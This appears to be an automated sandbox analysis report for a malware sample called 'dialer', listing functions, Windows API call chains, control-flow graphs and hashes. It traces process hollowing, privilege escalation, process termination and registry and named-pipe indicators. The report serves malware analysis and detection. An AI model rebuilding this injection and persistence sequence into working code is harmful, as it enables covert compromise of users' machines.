                                                                            • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                                          • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                          • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                                          • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                          • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                          • String ID:
                                                                          • API String ID: 1323846700-0
                                                                          • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                          • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                          • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                          • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                                          Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseHandleOpenWow64
                                                                          • String ID:
                                                                          • API String ID: 10462204-0
                                                                          • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                          • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                          • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                          • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                                          Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 178 140002258-14000225c call 14000226c 180 140002261-140002263 ExitProcess 178->180
                                                                          APIs
                                                                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                            • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                            • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                            • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                            • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                            • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                            • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                            • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                            • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                            • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                            • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                            • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                            • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                            • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                            • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                          • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                          • String ID:
                                                                          • API String ID: 3836936051-0
                                                                          • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                          • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                          • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                          • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                          Non-executed Functions

                                                                          Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 189 140002560-14000258c 190 140002592 189->190 191 14000273a-140002742 189->191 192 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 190->192 193 140002598-14000259f 190->193 194 140002748-14000274b 191->194 195 14000297e-1400029a2 ReadFile 191->195 196 140002a74-140002a8e 192->196 198 140002704-140002715 192->198 199 1400025a5-1400025a8 193->199 200 1400026bd-1400026bf ExitProcess 193->200 201 140002751-140002756 194->201 202 140002974-140002979 call 14000175c 194->202 195->196 197 1400029a8-1400029af 195->197 197->196 206 1400029b5-1400029c9 call 1400018ac 197->206 198->196 207 14000271b-140002733 call 1400010c0 198->207 208 1400025ae-1400025b1 199->208 209 140002660-14000268b RegOpenKeyExW 199->209 203 140002919-14000292c call 140001944 201->203 204 14000275c-14000275f 201->204 202->196 203->196 231 140002932-140002941 call 140001944 203->231 210 140002761-140002766 204->210 211 14000279d-1400027ae call 140001944 204->211 206->196 229 1400029cf-1400029d5 206->229 232 140002735 207->232 218 140002651-14000265b 208->218 219 1400025b7-1400025ba 208->219 216 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 209->216 217 14000268d-14000269b RegDeleteValueW 209->217 210->196 220 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 210->220 211->196 240 1400027b4-1400027d6 ReadFile 211->240 216->196 217->216 218->196 226 140002644-14000264c 219->226 227 1400025c0-1400025c5 219->227 226->196 227->196 234 1400025cb-1400025ef ReadFile 227->234 238 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 229->238 239 140002a5f 229->239 231->196 255 140002947-14000296f ShellExecuteW 231->255 232->196 234->196 236 1400025f5-1400025fc 234->236 236->196 243 140002602-140002616 call 1400018ac 236->243 258 140002a18-140002a1e 238->258 259 140002a49-140002a4f GetProcessHeap 238->259 245 140002a66-140002a6f call 140002a90 239->245 240->196 247 1400027dc-1400027e3 240->247 243->196 264 14000261c-140002622 243->264 245->196 247->196 254 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 247->254 260 14000290b-140002914 GetProcessHeap 254->260 261 14000282d-140002839 254->261 255->196 258->259 265 140002a20-140002a32 258->265 262 140002a52-140002a5d HeapFree 259->262 260->262 261->260 266 14000283f-14000284b 261->266 262->196 268 140002624-140002633 call 1400010c0 264->268 269 140002638-14000263f 264->269 270 140002a34-140002a36 265->270 271 140002a38-140002a40 265->271 266->260 272 140002851-14000285c 266->272 268->196 269->245 270->271 276 140002a44 call 1400016cc 270->276 271->259 277 140002a42 271->277 273 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 272->273 274 14000285e-140002869 272->274 273->260 274->260 278 14000286f-14000287c call 140001c88 274->278 276->259 277->265 278->260
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                          • String ID: SOFTWARE$dialerstager$open
                                                                          • API String ID: 3276259517-3931493855
                                                                          • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                                          • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                          • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                                          • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                                          Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 285 140001c88-140001cb8 286 140001cbb-140001cc8 285->286 287 140001e8c-140001e91 286->287 288 140001cce-140001d25 CreateProcessW 286->288 287->286 291 140001e97 287->291 289 140001e88 288->289 290 140001d2b-140001d5a VirtualAllocEx 288->290 289->287 292 140001e5d-140001e60 290->292 293 140001d60-140001d7b WriteProcessMemory 290->293 294 140001e99-140001eb9 291->294 295 140001e62-140001e76 OpenProcess 292->295 296 140001e85 292->296 293->292 297 140001d81-140001d87 293->297 295->289 298 140001e78-140001e83 TerminateProcess 295->298 296->289 299 140001dd2-140001def VirtualAlloc 297->299 300 140001d89 297->300 298->289 299->292 301 140001df1-140001e07 GetThreadContext 299->301 302 140001d8c-140001dba WriteProcessMemory 300->302 301->292 304 140001e09-140001e2e WriteProcessMemory 301->304 302->292 303 140001dc0-140001dcc 302->303 303->302 305 140001dce 303->305 304->292 306 140001e30-140001e4c SetThreadContext 304->306 305->299 306->292 307 140001e4e-140001e5b ResumeThread 306->307 307->292 308 140001eba-140001ebf 307->308 308->294
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                          • String ID: @
                                                                          • API String ID: 3462610200-2766056989
                                                                          • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                          • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                          • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                          • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                          Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                          • String ID: dialersvc64
                                                                          • API String ID: 4184240511-3881820561
                                                                          • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                          • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                          • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                          • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                          Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Delete$CloseEnumOpen
                                                                          • String ID: SOFTWARE\dialerconfig
                                                                          • API String ID: 3013565938-461861421
                                                                          • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                          • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                          • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                          • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                          Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: File$Write$CloseCreateHandle
                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                          • API String ID: 148219782-3440882674
                                                                          • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                          • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                          • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                          • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                          Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: ntdll.dll
                                                                          • API String ID: 1646373207-2227199552
                                                                          • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                          • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                          • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                          • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                          Execution Graph

                                                                          Execution Coverage:2.4%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:826
                                                                          Total number of Limit Nodes:2
                                                                          execution_graph 2822 140001ac3 2829 140001a70 2822->2829 2823 14000199e 2826 140001a0f 2823->2826 2827 1400019e9 VirtualProtect 2823->2827 2824 140001b36 2825 140001ba0 4 API calls 2824->2825 2828 140001b53 2825->2828 2827->2823 2829->2823 2829->2824 2829->2828 1994 140001ae4 1995 140001a70 1994->1995 1996 14000199e 1995->1996 1997 140001b36 1995->1997 2000 140001b53 1995->2000 1999 140001a0f 1996->1999 2001 1400019e9 VirtualProtect 1996->2001 2002 140001ba0 1997->2002 2001->1996 2005 140001bc2 2002->2005 2003 140001c04 memcpy 2003->2000 2005->2003 2006 140001c45 VirtualQuery 2005->2006 2007 140001cf4 2005->2007 2006->2007 2011 140001c72 2006->2011 2008 140001d23 GetLastError 2007->2008 2009 140001d37 2008->2009 2010 140001ca4 VirtualProtect 2010->2003 2010->2008 2011->2003 2011->2010 2030 140001404 2103 140001394 2030->2103 2032 140001413 2033 140001394 2 API calls 2032->2033 2034 140001422 2033->2034 2035 140001394 2 API calls 2034->2035 2036 140001431 2035->2036 2037 140001394 2 API calls 2036->2037 2038 140001440 2037->2038 2039 140001394 2 API calls 2038->2039 2040 14000144f 2039->2040 2041 140001394 2 API calls 2040->2041 2042 14000145e 2041->2042 2043 140001394 2 API calls 2042->2043 2044 14000146d 2043->2044 2045 140001394 2 API calls 2044->2045 2046 14000147c 2045->2046 2047 140001394 2 API calls 2046->2047 2048 14000148b 2047->2048 2049 140001394 2 API calls 2048->2049 2050 14000149a 2049->2050 2051 140001394 2 API calls 2050->2051 2052 1400014a9 2051->2052 2053 140001394 2 API calls 2052->2053 2054 1400014b8 2053->2054 2055 140001394 2 API calls 2054->2055 2056 1400014c7 2055->2056 2057 140001394 2 API calls 2056->2057 2058 1400014d6 2057->2058 2059 1400014e5 2058->2059 2060 140001394 2 API calls 2058->2060 2061 140001394 2 API calls 2059->2061 2060->2059 2062 1400014ef 2061->2062 2063 1400014f4 2062->2063 2064 140001394 2 API calls 2062->2064 2065 140001394 2 API calls 2063->2065 2064->2063 2066 1400014fe 2065->2066 2067 140001503 2066->2067 2068 140001394 2 API calls 2066->2068 2069 140001394 2 API calls 2067->2069 2068->2067 2070 14000150d 2069->2070 2071 140001394 2 API calls 2070->2071 2072 140001512 2071->2072 2073 140001394 2 API calls 2072->2073 2074 140001521 2073->2074 2075 140001394 2 API calls 2074->2075 2076 140001530 2075->2076 2077 140001394 2 API calls 2076->2077 2078 14000153f 2077->2078 2079 140001394 2 API calls 2078->2079 2080 14000154e 2079->2080 2081 140001394 2 API calls 2080->2081 2082 14000155d 2081->2082 2083 140001394 2 API calls 2082->2083 2084 14000156c 2083->2084 2085 140001394 2 API calls 2084->2085 2086 14000157b 2085->2086 2087 140001394 2 API calls 2086->2087 2088 14000158a 2087->2088 2089 140001394 2 API calls 2088->2089 2090 140001599 2089->2090 2091 140001394 2 API calls 2090->2091 2092 1400015a8 2091->2092 2093 140001394 2 API calls 2092->2093 2094 1400015b7 2093->2094 2095 140001394 2 API calls 2094->2095 2096 1400015c6 2095->2096 2097 140001394 2 API calls 2096->2097 2098 1400015d5 2097->2098 2099 140001394 2 API calls 2098->2099 2100 1400015e4 2099->2100 2101 140001394 2 API calls 2100->2101 2102 1400015f3 2101->2102 2104 140005aa0 malloc 2103->2104 2105 1400013b8 2104->2105 2106 1400013c6 NtQueryInformationProcess 2105->2106 2106->2032 2107 140002104 2108 140002111 EnterCriticalSection 2107->2108 2109 140002218 2107->2109 2110 14000220b LeaveCriticalSection 2108->2110 2114 14000212e 2108->2114 2111 140002272 2109->2111 2113 140002241 DeleteCriticalSection 2109->2113 2110->2109 2112 14000214d TlsGetValue GetLastError 2112->2114 2113->2111 2114->2110 2114->2112 2012 14000216f 2013 140002185 2012->2013 2014 140002178 InitializeCriticalSection 2012->2014 2014->2013 2015 140001a70 2016 14000199e 2015->2016 2020 140001a7d 2015->2020 2017 140001a0f 2016->2017 2018 1400019e9 VirtualProtect 2016->2018 2018->2016 2019 140001b53 2020->2015 2020->2019 2021 140001b36 2020->2021 2022 140001ba0 4 API calls 2021->2022 2022->2019 2830 140002050 2831 14000205e EnterCriticalSection 2830->2831 2832 1400020cf 2830->2832 2833 1400020c2 LeaveCriticalSection 2831->2833 2834 140002079 2831->2834 2833->2832 2834->2833 2835 140001fd0 2836 140001fe4 2835->2836 2837 140002033 2835->2837 2836->2837 2838 140001ffd EnterCriticalSection LeaveCriticalSection 2836->2838 2838->2837 2123 140001ab3 2124 140001a70 2123->2124 2124->2123 2125 14000199e 2124->2125 2126 140001b36 2124->2126 2129 140001b53 2124->2129 2128 140001a0f 2125->2128 2130 1400019e9 VirtualProtect 2125->2130 2127 140001ba0 4 API calls 2126->2127 2127->2129 2130->2125 1984 140001394 1988 140005aa0 1984->1988 1986 1400013b8 1987 1400013c6 NtQueryInformationProcess 1986->1987 1989 140005abe 1988->1989 1992 140005aeb 1988->1992 1989->1986 1990 140005b93 1991 140005baf malloc 1990->1991 1993 140005bd0 1991->1993 1992->1989 1992->1990 1993->1989 2115 14000219e 2116 140002272 2115->2116 2117 1400021ab EnterCriticalSection 2115->2117 2118 140002265 LeaveCriticalSection 2117->2118 2120 1400021c8 2117->2120 2118->2116 2119 1400021e9 TlsGetValue GetLastError 2119->2120 2120->2118 2120->2119 2023 140001800 2024 140001812 2023->2024 2025 140001835 fprintf 2024->2025 2026 140001000 2027 14000108b __set_app_type 2026->2027 2028 140001040 2026->2028 2029 1400010b6 2027->2029 2028->2027 2121 140002320 strlen 2122 140002337 2121->2122 2131 140001140 2134 140001160 2131->2134 2133 140001156 2135 1400011b9 2134->2135 2136 14000118b 2134->2136 2137 1400011d3 2135->2137 2138 1400011c7 _amsg_exit 2135->2138 2136->2135 2139 1400011a0 Sleep 2136->2139 2140 140001201 _initterm 2137->2140 2141 14000121a 2137->2141 2138->2137 2139->2135 2139->2136 2140->2141 2157 140001880 2141->2157 2144 14000126a 2145 14000126f malloc 2144->2145 2146 14000128b 2145->2146 2148 1400012d0 2145->2148 2147 1400012a0 strlen malloc memcpy 2146->2147 2147->2147 2147->2148 2168 140003150 2148->2168 2150 140001315 2151 140001344 2150->2151 2152 140001324 2150->2152 2155 140001160 50 API calls 2151->2155 2153 140001338 2152->2153 2154 14000132d _cexit 2152->2154 2153->2133 2154->2153 2156 140001366 2155->2156 2156->2133 2158 140001247 SetUnhandledExceptionFilter 2157->2158 2159 1400018a2 2157->2159 2158->2144 2159->2158 2160 14000194d 2159->2160 2164 140001a20 2159->2164 2161 14000199e 2160->2161 2162 140001ba0 4 API calls 2160->2162 2161->2158 2163 1400019e9 VirtualProtect 2161->2163 2162->2160 2163->2161 2164->2161 2165 140001b53 2164->2165 2166 140001b36 2164->2166 2167 140001ba0 4 API calls 2166->2167 2167->2165 2171 140003166 2168->2171 2169 1400032cb wcslen 2242 14000153f 2169->2242 2171->2169 2173 1400034ce 2173->2150 2179 1400033c6 2180 14000346e wcslen 2179->2180 2181 140003484 2180->2181 2182 1400034cc 2180->2182 2181->2182 2184 1400034b6 wcslen 2181->2184 2183 140003591 wcscpy wcscat 2182->2183 2186 1400035c3 2183->2186 2184->2181 2184->2182 2185 140003613 wcscpy wcscat 2188 140003649 2185->2188 2186->2185 2187 14000375e wcscpy wcscat 2190 140003797 2187->2190 2188->2187 2189 140003afe wcslen 2191 140003b0c 2189->2191 2193 140003b4b 2189->2193 2190->2189 2191->2193 2194 140003b36 wcslen 2191->2194 2192 140003c02 wcscpy wcscat 2196 140003c37 2192->2196 2193->2192 2194->2191 2194->2193 2195 140003c87 wcscpy wcscat 2198 140003cc0 2195->2198 2196->2195 2197 140003cfd wcscpy wcscat 2200 140003d44 2197->2200 2198->2197 2199 140003d96 wcscpy wcscat wcslen 2382 14000146d 2199->2382 2200->2199 2205 140003ead 2468 1400014a9 2205->2468 2206 140003fdf 2208 14000145e 2 API calls 2206->2208 2214 140003f44 2208->2214 2210 140003fce 2215 14000145e 2 API calls 2210->2215 2211 140005709 2213 140004071 wcscpy wcscat wcslen 2234 140004140 2213->2234 2214->2211 2214->2213 2215->2214 2217 140003f38 2219 14000145e 2 API calls 2217->2219 2219->2214 2220 140004235 wcslen 2221 14000153f 2 API calls 2220->2221 2221->2234 2222 14000531a memcpy 2222->2234 2223 140004452 wcslen 2629 14000157b 2223->2629 2224 1400046cd wcslen 2226 14000153f 2 API calls 2224->2226 2226->2234 2227 14000145e NtQueryInformationProcess malloc 2227->2234 2228 140004fb1 wcscpy wcscat wcslen 2229 140001422 2 API calls 2228->2229 2229->2234 2231 14000454a wcslen 2646 1400015a8 2231->2646 2234->2220 2234->2222 2234->2223 2234->2224 2234->2227 2234->2228 2234->2231 2235 1400050f3 2234->2235 2236 14000547c memcpy 2234->2236 2237 1400026e0 9 API calls 2234->2237 2238 14000519e wcslen 2234->2238 2240 140004e05 wcscpy wcscat wcslen 2234->2240 2584 1400014d6 2234->2584 2657 140001521 2234->2657 2755 140001431 2234->2755 2235->2150 2236->2234 2237->2234 2239 1400015a8 2 API calls 2238->2239 2239->2234 2686 140001422 2240->2686 2243 140001394 2 API calls 2242->2243 2244 14000154e 2243->2244 2245 140001394 2 API calls 2244->2245 2246 14000155d 2245->2246 2247 140001394 2 API calls 2246->2247 2248 14000156c 2247->2248 2249 140001394 2 API calls 2248->2249 2250 14000157b 2249->2250 2251 140001394 2 API calls 2250->2251 2252 14000158a 2251->2252 2253 140001394 2 API calls 2252->2253 2254 140001599 2253->2254 2255 140001394 2 API calls 